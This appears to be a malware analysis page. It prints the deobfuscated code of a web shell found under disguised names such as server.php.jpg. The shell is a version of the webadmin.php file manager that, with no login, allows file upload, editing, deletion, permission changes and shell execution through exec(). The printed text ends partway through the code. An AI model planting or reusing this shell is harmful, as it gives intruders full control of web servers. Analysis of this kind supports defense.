PHP Malware Analysis

lildoo.php, server.php.jpg, server.xt.php, webadmin.php

md5: 720d527f359bd8515f5cf46648ebfab4

Jump to:

Screenshot


Attributes

Encoding

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

/*
 * webadmin.php - a simple Web-based file manager
 * Copyright (C) 2004-2011  Daniel Wacker [daniel dot wacker at web dot de]
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
 * -------------------------------------------------------------------------
 * While using this script, do NOT navigate with your browser's back and
 * forward buttons! Always open files in a new browser tab!
 * -------------------------------------------------------------------------
 *
 * This is Version 0.9, revision 12
 * =========================================================================
 *
 * Changes of revision 12
 * [bhb at o2 dot pl]
 *    added Polish translation
 * [daniel dot wacker at web dot de]
 *    switched to UTF-8
 *    fixed undefined variable
 *
 * Changes of revision 11
 * [daniel dot wacker at web dot de]
 *    fixed handling if folder isn't readable
 *
 * Changes of revision 10
 * [alex dash smirnov at web.de]
 *    added Russian translation
 * [daniel dot wacker at web dot de]
 *    added </td> to achieve valid XHTML (thanks to Marc Magos)
 *    improved delete function
 * [ava at asl dot se]
 *    new list order: folders first
 *
 * Changes of revision 9
 * [daniel dot wacker at web dot de]
 *    added workaround for directory listing, if lstat() is disabled
 *    fixed permisson of uploaded files (thanks to Stephan Duffner)
 *
 * Changes of revision 8
 * [okankan at stud dot sdu dot edu dot tr]
 *    added Turkish translation
 * [j at kub dot cz]
 *    added Czech translation
 * [daniel dot wacker at web dot de]
 *    improved charset handling
 *
 * Changes of revision 7
 * [szuniga at vtr dot net]
 *    added Spanish translation
 * [lars at soelgaard dot net]
 *    added Danish translation
 * [daniel dot wacker at web dot de]
 *    improved rename dialog
 *
 * Changes of revision 6
 * [nederkoorn at tiscali dot nl]
 *    added Dutch translation
 *
 * Changes of revision 5
 * [daniel dot wacker at web dot de]
 *    added language auto select
 *    fixed symlinks in directory listing
 *    removed word-wrap in edit textarea
 *
 * Changes of revision 4
 * [daloan at guideo dot fr]
 *    added French translation
 * [anders at wiik dot cc]
 *    added Swedish translation
 *
 * Changes of revision 3
 * [nzunta at gabriele dash erba dot it]
 *    improved Italian translation
 *
 * Changes of revision 2
 * [daniel dot wacker at web dot de]
 *    got images work in some old browsers
 *    fixed creation of directories
 *    fixed files deletion
 *    improved path handling
 *    added missing word 'not_created'
 * [till at tuxen dot de]
 *    improved human readability of file sizes
 * [nzunta at gabriele dash erba dot it]
 *    added Italian translation
 *
 * Changes of revision 1
 * [daniel dot wacker at web dot de]
 *    webadmin.php completely rewritten:
 *    - clean XHTML/CSS output
 *    - several files selectable
 *    - support for windows servers
 *    - no more treeview, because
 *      - webadmin.php is a >simple< file manager
 *      - performance problems (too much additional code)
 *      - I don't like: frames, java-script, to reload after every treeview-click
 *    - execution of shell scripts
 *    - introduced revision numbers
 *
/* ------------------------------------------------------------------------- */
/* Your language:
 * 'en' - English
 * 'de' - German
 * 'fr' - French
 * 'it' - Italian
 * 'nl' - Dutch
 * 'se' - Swedish
 * 'sp' - Spanish
 * 'dk' - Danish
 * 'tr' - Turkish
 * 'cs' - Czech
 * 'ru' - Russian
 * 'pl' - Polish
 * 'auto' - autoselect
 */
$lang = 'auto';
/* Homedir:
 * For example: './' - the script's directory
 */
$homedir = './';
/* Size of the edit textarea
 */
$editcols = 80;
$editrows = 25;
/* -------------------------------------------
 * Optional configuration (remove # to enable)
 */
/* Permission of created directories:
 * For example: 0705 would be 'drwx---r-x'.
 */
# $dirpermission = 0705;
/* Permission of created files:
 * For example: 0604 would be '-rw----r--'.
 */
# $filepermission = 0604;
/* Filenames related to the apache web server:
 */
$htaccess = '.htaccess';
$htpasswd = '.htpasswd';
/* ------------------------------------------------------------------------- */
if (get_magic_quotes_gpc()) {
    array_walk($_GET, 'strip');
    array_walk($_POST, 'strip');
    array_walk($_REQUEST, 'strip');
}
if (array_key_exists('image', $_GET)) {
    header('Content-Type: image/gif');
    die(getimage($_GET['image']));
}
if (!function_exists('lstat')) {
    function lstat($filename)
    {
        return stat($filename);
    }
}
$delim = DIRECTORY_SEPARATOR;
if (function_exists('php_uname')) {
    $win = false;
} else {
    $win = false;
}
if (!empty($_SERVER['PATH_TRANSLATED'])) {
    $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
    $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
    $scriptdir = getcwd();
} else {
    $scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);
$dir = array_key_exists('dir', $_REQUEST) ? $_REQUEST['dir'] : $homedir;
if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
    $dir = relative2absolute($dir, $_POST['olddir']);
}
$directory = simplify_path(addslash($dir));
$files = array();
$action = '';
if (!empty($_POST['submit_all'])) {
    $action = $_POST['action_all'];
    for ($i = 0; $i < $_POST['num']; $i++) {
        if (array_key_exists("checked{$i}", $_POST) && $_POST["checked{$i}"] == 'true') {
            $files[] = $_POST["file{$i}"];
        }
    }
} elseif (!empty($_REQUEST['action'])) {
    $action = $_REQUEST['action'];
    $files[] = relative2absolute($_REQUEST['file'], $directory);
} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
    $files[] = $_FILES['upload'];
    $action = 'upload';
} elseif (array_key_exists('num', $_POST)) {
    for ($i = 0; $i < $_POST['num']; $i++) {
        if (array_key_exists("submit{$i}", $_POST)) {
            break;
        }
    }
    if ($i < $_POST['num']) {
        $action = $_POST["action{$i}"];
        $files[] = $_POST["file{$i}"];
    }
}
if (empty($action) && (!empty($_POST['submit_create']) || array_key_exists('focus', $_POST) && $_POST['focus'] == 'create') && !empty($_POST['create_name'])) {
    $files[] = relative2absolute($_POST['create_name'], $directory);
    switch ($_POST['create_type']) {
        case 'directory':
            $action = 'create_directory';
            break;
        case 'file':
            $action = 'create_file';
    }
}
if (sizeof($files) == 0) {
    $action = '';
} else {
    $file = reset($files);
}
if ($lang == 'auto') {
    if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
        $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
    } else {
        $lang = 'en';
    }
}
$words = getwords($lang);
if ($site_charset == 'auto') {
    $site_charset = $word_charset;
}
$cols = $win ? 4 : 7;
if (!isset($dirpermission)) {
    $dirpermission = function_exists('umask') ? 0777 & ~umask() : 0755;
}
if (!isset($filepermission)) {
    $filepermission = function_exists('umask') ? 0666 & ~umask() : 0644;
}
if (!empty($_SERVER['SCRIPT_NAME'])) {
    $self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
    $self = html(basename($_SERVER['PHP_SELF']));
} else {
    $self = '';
}
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
    if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
        $apache = true;
    } else {
        $apache = false;
    }
} else {
    $apache = true;
}
switch ($action) {
    case 'view':
        if (is_script($file)) {
            /* highlight_file is a mess! */
            ob_start();
            highlight_file($file);
            $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \\1">', ob_get_contents());
            $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
            ob_end_clean();
            html_header();
            echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>

<hr />

<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';
            for ($i = 1; $i <= sizeof(file($file)); $i++) {
                echo "{$i}\n";
            }
            echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
</td>
</tr>
</table>

';
            html_footer();
        } else {
            header('Content-Type: ' . getmimetype($file));
            header('Content-Disposition: filename=' . basename($file));
            readfile($file);
        }
        break;
    case 'download':
        header('Pragma: public');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Content-Type: ' . getmimetype($file));
        header('Content-Disposition: attachment; filename=' . basename($file) . ';');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        break;
    case 'upload':
        $dest = relative2absolute($file['name'], $directory);
        if (@file_exists($dest)) {
            listing_page(error('already_exists', $dest));
        } elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
            @chmod($dest, $filepermission);
            listing_page(notice('uploaded', $file['name']));
        } else {
            listing_page(error('not_uploaded', $file['name']));
        }
        break;
    case 'create_directory':
        if (@file_exists($file)) {
            listing_page(error('already_exists', $file));
        } else {
            $old = @umask(0777 & ~$dirpermission);
            if (@mkdir($file, $dirpermission)) {
                listing_page(notice('created', $file));
            } else {
                listing_page(error('not_created', $file));
            }
            @umask($old);
        }
        break;
    case 'create_file':
        if (@file_exists($file)) {
            listing_page(error('already_exists', $file));
        } else {
            $old = @umask(0777 & ~$filepermission);
            if (@touch($file)) {
                edit($file);
            } else {
                listing_page(error('not_created', $file));
            }
            @umask($old);
        }
        break;
    case 'execute':
        chdir(dirname($file));
        $output = array();
        $retval = 0;
        exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
        $error = false;
        if (sizeof($output) == 0) {
            $output = array('<' . $words['no_output'] . '>');
        }
        if ($error) {
            listing_page(error('not_executed', $file, implode("\n", $output)));
        } else {
            listing_page(notice('executed', $file, implode("\n", $output)));
        }
        break;
    case 'delete':
        if (!empty($_POST['no'])) {
            listing_page();
        } elseif (!empty($_POST['yes'])) {
            $failure = array();
            $success = array();
            foreach ($files as $file) {
                if (del($file)) {
                    $success[] = $file;
                } else {
                    $failure[] = $file;
                }
            }
            $message = '';
            if (sizeof($failure) > 0) {
                $message = error('not_deleted', implode("\n", $failure));
            }
            if (sizeof($success) > 0) {
                $message .= notice('deleted', implode("\n", $success));
            }
            listing_page($message);
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
            request_dump();
            echo "\t<b>" . word('really_delete') . '</b>
	<p>
';
            foreach ($files as $file) {
                echo "\t" . html($file) . "<br />\n";
            }
            echo '	</p>
	<hr />
	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
</form>

';
            html_footer();
        }
        break;
    case 'rename':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            if (!@file_exists($dest) && @rename($file, $dest)) {
                listing_page(notice('renamed', $file, $dest));
            } else {
                listing_page(error('not_renamed', $file, $dest));
            }
        } else {
            $name = basename($file);
            html_header();
            echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
	<input type="hidden" name="action" value="rename" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />
	<b>' . word('rename_file') . '</b>
	<p>' . html($file) . '</p>
	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
	<hr />
	<input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';
            html_footer();
        }
        break;
    case 'move':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            $failure = array();
            $success = array();
            foreach ($files as $file) {
                $filename = substr($file, strlen($directory));
                $d = $dest . $filename;
                if (!@file_exists($d) && @rename($file, $d)) {
                    $success[] = $file;
                } else {
                    $failure[] = $file;
                }
            }
            $message = '';
            if (sizeof($failure) > 0) {
                $message = error('not_moved', implode("\n", $failure), $dest);
            }
            if (sizeof($success) > 0) {
                $message .= notice('moved', implode("\n", $success), $dest);
            }
            listing_page($message);
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
';
            request_dump();
            echo "\t<b>" . word('move_files') . '</b>
	<p>
';
            foreach ($files as $file) {
                echo "\t" . html($file) . "<br />\n";
            }
            echo '	</p>
	<hr />
	' . word('destination') . ':
	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
	<input type="submit" value="' . word('move') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';
            html_footer();
        }
        break;
    case 'copy':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            if (@is_dir($dest)) {
                $failure = array();
                $success = array();
                foreach ($files as $file) {
                    $filename = substr($file, strlen($directory));
                    $d = addslash($dest) . $filename;
                    if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
                        $success[] = $file;
                    } else {
                        $failure[] = $file;
                    }
                }
                $message = '';
                if (sizeof($failure) > 0) {
                    $message = error('not_copied', implode("\n", $failure), $dest);
                }
                if (sizeof($success) > 0) {
                    $message .= notice('copied', implode("\n", $success), $dest);
                }
                listing_page($message);
            } else {
                if (!@file_exists($dest) && @copy($file, $dest)) {
                    listing_page(notice('copied', $file, $dest));
                } else {
                    listing_page(error('not_copied', $file, $dest));
                }
            }
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
';
            request_dump();
            echo "\n<b>" . word('copy_files') . '</b>
	<p>
';
            foreach ($files as $file) {
                echo "\t" . html($file) . "<br />\n";
            }
            echo '	</p>
	<hr />
	' . word('destination') . ':
	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
	<input type="submit" value="' . word('copy') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';
            html_footer();
        }
        break;
    case 'create_symlink':
        if (!empty($_POST['destination'])) {
            $dest = relative2absolute($_POST['destination'], $directory);
            if (substr($dest, -1, 1) == $delim) {
                $dest .= basename($file);
            }
            if (!empty($_POST['relative'])) {
                $file = absolute2relative(addslash(dirname($dest)), $file);
            }
            if (!@file_exists($dest) && @symlink($file, $dest)) {
                listing_page(notice('symlinked', $file, $dest));
            } else {
                listing_page(error('not_symlinked', $file, $dest));
            }
        } else {
            html_header();
            echo '<form action="' . $self . '" method="post">

<table class="dialog" id="symlink">
<tr>
	<td style="vertical-align: top">' . word('destination') . ': </td>
	<td>
		<b>' . html($file) . '</b><br />
		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
		<label for="checkbox_relative">' . word('relative') . '</label>
		<input type="hidden" name="action" value="create_symlink" />
		<input type="hidden" name="file" value="' . html($file) . '" />
		<input type="hidden" name="dir" value="' . html($directory) . '" />
	</td>
</tr>
<tr>
	<td>' . word('symlink') . ': </td>
	<td>
		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
		<input type="submit" value="' . word('create_symlink') . '" />
	</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';
            html_footer();
        }
        break;
    case 'edit':
        if (!empty($_POST['save'])) {
            $content = str_replace("\r\n", "\n", $_POST['content']);
            if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
                listing_page(notice('saved', $file));
            } else {
                listing_page(error('not_saved', $file));
            }
        } else {
            if (@is_readable($file) && @is_writable($file)) {
                edit($file);
            } else {
                listing_page(error('not_edited', $file));
            }
        }
        break;
    case 'permission':
        if (!empty($_POST['set'])) {
            $mode = 0;
            if (!empty($_POST['ur'])) {
                $mode = 256;
            }
            if (!empty($_POST['uw'])) {
                $mode |= 0200;
            }
            if (!empty($_POST['ux'])) {
                $mode |= 0100;
            }
            if (!empty($_POST['gr'])) {
                $mode |= 040;
            }
            if (!empty($_POST['gw'])) {
                $mode |= 020;
            }
            if (!empty($_POST['gx'])) {
                $mode |= 010;
            }
            if (!empty($_POST['or'])) {
                $mode |= 04;
            }
            if (!empty($_POST['ow'])) {
                $mode |= 02;
            }
            if (!empty($_POST['ox'])) {
                $mode |= 01;
            }
            if (@chmod($file, $mode)) {
                listing_page(notice('permission_set', $file, decoct($mode)));
            } else {
                listing_page(error('permission_not_set', $file, decoct($mode)));
            }
        } else {
            html_header();
            $mode = fileperms($file);
            echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>

	<hr />

	<table id="permission">
	<tr>
		<td></td>
		<td style="border-right: 1px solid black">' . word('owner') . '</td>
		<td style="border-right: 1px solid black">' . word('group') . '</td>
		<td>' . word('other') . '</td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('read') . ':</td>
		<td><input type="checkbox" name="ur" value="1"';
            if ($mode & 0400) {
                echo " checked=\"checked\"";
            }
            echo " /></td>\r\n\t\t<td><input type=\"checkbox\" name=\"gr\" value=\"1\"";
            if ($mode & 040) {
                echo " checked=\"checked\"";
            }
            echo " /></td>\r\n\t\t<td><input type=\"checkbox\" name=\"or\" value=\"1\"";
            if ($mode & 04) {
                echo " checked=\"checked\"";
            }
            echo ' /></td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('write') . ':</td>
		<td><input type="checkbox" name="uw" value="1"';
            if ($mode & 0200) {
                echo " checked=\"checked\"";
            }
            echo " /></td>\r\n\t\t<td><input type=\"checkbox\" name=\"gw\" value=\"1\"";
            if ($mode & 020) {
                echo " checked=\"checked\"";
            }
            echo " /></td>\r\n\t\t<td><input type=\"checkbox\" name=\"ow\" value=\"1\"";
            if ($mode & 02) {
                echo " checked=\"checked\"";
            }
            echo ' /></td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('execute') . ':</td>
		<td><input type="checkbox" name="ux" value="1"';
            if ($mode & 0100) {
                echo " checked=\"checked\"";
            }
            echo " /></td>\r\n\t\t<td><input type=\"checkbox\" name=\"gx\" value=\"1\"";
            if ($mode & 010) {
                echo " checked=\"checked\"";
            }
            echo " /></td>\r\n\t\t<td><input type=\"checkbox\" name=\"ox\" value=\"1\"";
            if ($mode & 01) {
                echo " checked=\"checked\"";
            }
            echo ' /></td>
	</tr>
	</table>

	<hr />

	<input type="submit" name="set" value="' . word('set') . '" />

	<input type="hidden" name="action" value="permission" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';
            html_footer();
        }
        break;
    default:
        listing_page();
}
/* ------------------------------------------------------------------------- */
function getlist($directory)
{
    global $delim, $win;
    if ($d = @opendir($directory)) {
        while (($filename = @readdir($d)) !== false) {
            $path = $directory . $filename;
            if ($stat = @lstat($path)) {
                $file = array('filename' => $filename, 'path' => $path, 'is_file' => @is_file($path), 'is_dir' => @is_dir($path), 'is_link' => @is_link($path), 'is_readable' => @is_readable($path), 'is_writable' => @is_writable($path), 'size' => $stat['size'], 'permission' => $stat['mode'], 'owner' => $stat['uid'], 'group' => $stat['gid'], 'mtime' => @filemtime($path), 'atime' => @fileatime($path), 'ctime' => @filectime($path));
                if ($file['is_dir']) {
                    $file['is_executable'] = @file_exists($path . $delim . '.');
                } else {
                    if (!$win) {
                        $file['is_executable'] = @is_executable($path);
                    } else {
                        $file['is_executable'] = true;
                    }
                }
                if ($file['is_link']) {
                    $file['target'] = @readlink($path);
                }
                if (function_exists('posix_getpwuid')) {
                    $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
                }
                if (function_exists('posix_getgrgid')) {
                    $file['group_name'] = @reset(posix_getgrgid($file['group']));
                }
                $files[] = $file;
            }
        }
        return $files;
    } else {
        return false;
    }
}
function sortlist($list, $key, $reverse)
{
    $dirs = array();
    $files = array();
    for ($i = 0; $i < sizeof($list); $i++) {
        if ($list[$i]['is_dir']) {
            $dirs[] = $list[$i];
        } else {
            $files[] = $list[$i];
        }
    }
    quicksort($dirs, 0, sizeof($dirs) - 1, $key);
    if ($reverse) {
        $dirs = array_reverse($dirs);
    }
    quicksort($files, 0, sizeof($files) - 1, $key);
    if ($reverse) {
        $files = array_reverse($files);
    }
    return array_merge($dirs, $files);
}
function quicksort(&$array, $first, $last, $key)
{
    if ($first < $last) {
        $cmp = $array[floor(($first + $last) / 2)][$key];
        $l = $first;
        $r = $last;
        while ($l <= $r) {
            while ($array[$l][$key] < $cmp) {
                $l++;
            }
            while ($array[$r][$key] > $cmp) {
                $r--;
            }
            if ($l <= $r) {
                $tmp = $array[$l];
                $array[$l] = $array[$r];
                $array[$r] = $tmp;
                $l++;
                $r--;
            }
        }
        quicksort($array, $first, $r, $key);
        quicksort($array, $l, $last, $key);
    }
}
function permission_octal2string($mode)
{
    if (($mode & 0xc000) === 0xc000) {
        $type = 's';
    } elseif (($mode & 0xa000) === 0xa000) {
        $type = 'l';
    } elseif (($mode & 0x8000) === 0x8000) {
        $type = '-';
    } elseif (($mode & 0x6000) === 0x6000) {
        $type = 'b';
    } elseif (($mode & 0x4000) === 0x4000) {
        $type = 'd';
    } elseif (($mode & 0x2000) === 0x2000) {
        $type = 'c';
    } elseif (($mode & 0x1000) === 0x1000) {
        $type = 'p';
    } else {
        $type = '?';
    }
    $owner = $mode & 0400 ? 'r' : '-';
    $owner .= $mode & 0200 ? 'w' : '-';
    if ($mode & 0x800) {
        $owner .= $mode & 0100 ? 's' : 'S';
    } else {
        $owner .= $mode & 0100 ? 'x' : '-';
    }
    $group = $mode & 040 ? 'r' : '-';
    $group .= $mode & 020 ? 'w' : '-';
    if ($mode & 0x400) {
        $group .= $mode & 010 ? 's' : 'S';
    } else {
        $group .= $mode & 010 ? 'x' : '-';
    }
    $other = $mode & 04 ? 'r' : '-';
    $other .= $mode & 02 ? 'w' : '-';
    if ($mode & 0x200) {
        $other .= $mode & 01 ? 't' : 'T';
    } else {
        $other .= $mode & 01 ? 'x' : '-';
    }
    return $type . $owner . $group . $other;
}
function is_script($filename)
{
    return ereg('\\.php$|\\.php3$|\\.php4$|\\.php5$', $filename);
}
function getmimetype($filename)
{
    static $mimes = array('\\.jpg$|\\.jpeg$' => 'image/jpeg', '\\.gif$' => 'image/gif', '\\.png$' => 'image/png', '\\.html$|\\.html$' => 'text/html', '\\.txt$|\\.asc$' => 'text/plain', '\\.xml$|\\.xsl$' => 'application/xml', '\\.pdf$' => 'application/pdf');
    foreach ($mimes as $regex => $mime) {
        if (eregi($regex, $filename)) {
            return $mime;
        }
    }
    return "text/plain";
}
function del($file)
{
    global $delim;
    if (!file_exists($file)) {
        return false;
    }
    if (@is_dir($file) && !@is_link($file)) {
        $success = false;
        if (@rmdir($file)) {
            $success = true;
        } elseif ($dir = @opendir($file)) {
            $success = true;
            while (($f = readdir($dir)) !== false) {
                if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
                    $success = false;
                }
            }
            closedir($dir);
            if ($success) {
                $success = @rmdir($file);
            }
        }
        return $success;
    }
    return @unlink($file);
}
function addslash($directory)
{
    global $delim;
    if (substr($directory, -1, 1) != $delim) {
        return $directory . $delim;
    } else {
        return $directory;
    }
}
function relative2absolute($string, $directory)
{
    if (path_is_relative($string)) {
        return simplify_path(addslash($directory) . $string);
    } else {
        return simplify_path($string);
    }
}
function path_is_relative($path)
{
    global $win;
    if ($win) {
        return substr($path, 1, 1) != ':';
    } else {
        return substr($path, 0, 1) != '/';
    }
}
function absolute2relative($directory, $target)
{
    global $delim;
    $path = '';
    while ($directory != $target) {
        if ($directory == substr($target, 0, strlen($directory))) {
            $path .= substr($target, strlen($directory));
            break;
        } else {
            $path .= '..' . $delim;
            $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
        }
    }
    if ($path == '') {
        $path = '.';
    }
    return $path;
}
function simplify_path($path)
{
    global $delim;
    if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
        $path = realpath($path);
        if (@is_dir($path)) {
            return addslash($path);
        } else {
            return $path;
        }
    }
    $pattern = $delim . '.' . $delim;
    if (@is_dir($path)) {
        $path = addslash($path);
    }
    while (strpos($path, $pattern) !== false) {
        $path = str_replace($pattern, $delim, $path);
    }
    $e = addslashes($delim);
    $regex = $e . '((\\.[^\\.' . $e . '][^' . $e . ']*)|(\\.\\.[^' . $e . ']+)|([^\\.][^' . $e . ']*))' . $e . '\\.\\.' . $e;
    while (ereg($regex, $path)) {
        $path = ereg_replace($regex, $delim, $path);
    }
    return $path;
}
function human_filesize($filesize)
{
    $suffices = 'kMGTPE';
    $n = 0;
    while ($filesize >= 1000) {
        $filesize /= 1024;
        $n++;
    }
    $filesize = round($filesize, 3 - strpos($filesize, '.'));
    if (strpos($filesize, '.') !== false) {
        while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
            $filesize = substr($filesize, 0, strlen($filesize) - 1);
        }
    }
    $suffix = $n == 0 ? '' : substr($suffices, $n - 1, 1);
    return $filesize . " {$suffix}B";
}
function strip(&$str)
{
    $str = stripslashes($str);
}
/* ------------------------------------------------------------------------- */
function listing_page($message = null)
{
    global $self, $directory, $sort, $reverse;
    html_header();
    $list = getlist($directory);
    if (array_key_exists('sort', $_GET)) {
        $sort = $_GET['sort'];
    } else {
        $sort = 'filename';
    }
    if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') {
        $reverse = true;
    } else {
        $reverse = false;
    }
    echo '<h1 style="margin-bottom: 0">webadmin.php</h1>

<form enctype="multipart/form-data" action="' . $self . '" method="post">

<table id="main">
';
    directory_choice();
    if (!empty($message)) {
        spacer();
        echo $message;
    }
    if (@is_writable($directory)) {
        upload_box();
        create_box();
    } else {
        spacer();
    }
    if ($list) {
        $list = sortlist($list, $sort, $reverse);
        listing($list);
    } else {
        echo error('not_readable', $directory);
    }
    echo "</table>\r\n\r\n</form>\r\n\r\n";
    html_footer();
}
function listing($list)
{
    global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
    echo '<tr class="listing">
	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
';
    column_title('filename', $sort, $reverse);
    column_title('size', $sort, $reverse);
    if (!$win) {
        column_title('permission', $sort, $reverse);
        column_title('owner', $sort, $reverse);
        column_title('group', $sort, $reverse);
    }
    echo '	<th class="functions">' . word('functions') . '</th>
</tr>
';
    for ($i = 0; $i < sizeof($list); $i++) {
        $file = $list[$i];
        $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
        $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
        $timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
        echo '<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
	<td class="filename" title="' . html($timestamps) . '">';
        if ($file['is_link']) {
            echo '<img src="' . $self . '?image=link" alt="link" /> ';
            echo html($file['filename']) . ' &rarr; ';
            $real_file = relative2absolute($file['target'], $directory);
            if (@is_readable($real_file)) {
                if (@is_dir($real_file)) {
                    echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
                } else {
                    echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
                }
            } else {
                echo html($file['target']);
            }
        } elseif ($file['is_dir']) {
            echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
            if ($win || $file['is_executable']) {
                echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
            echo " ]";
        } else {
            if (substr($file['filename'], 0, 1) == '.') {
                echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
            } else {
                echo '<img src="' . $self . '?image=file" alt="file" /> ';
            }
            if ($file['is_file'] && $file['is_readable']) {
                echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
        }
        if ($file['size'] >= 1000) {
            $human = ' title="' . human_filesize($file['size']) . '"';
        } else {
            $human = '';
        }
        echo "</td>\n";
        echo "\t<td class=\"size\"{$human}>{$file['size']} B</td>\n";
        if (!$win) {
            echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
            $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
            if ($l) {
                echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
            }
            echo html(permission_octal2string($file['permission']));
            if ($l) {
                echo "</a>";
            }
            echo "</td>\n";
            if (array_key_exists('owner_name', $file)) {
                echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
            } else {
                echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
            }
            if (array_key_exists('group_name', $file)) {
                echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
            } else {
                echo "\t<td class=\"group\">{$file['group']}</td>\n";
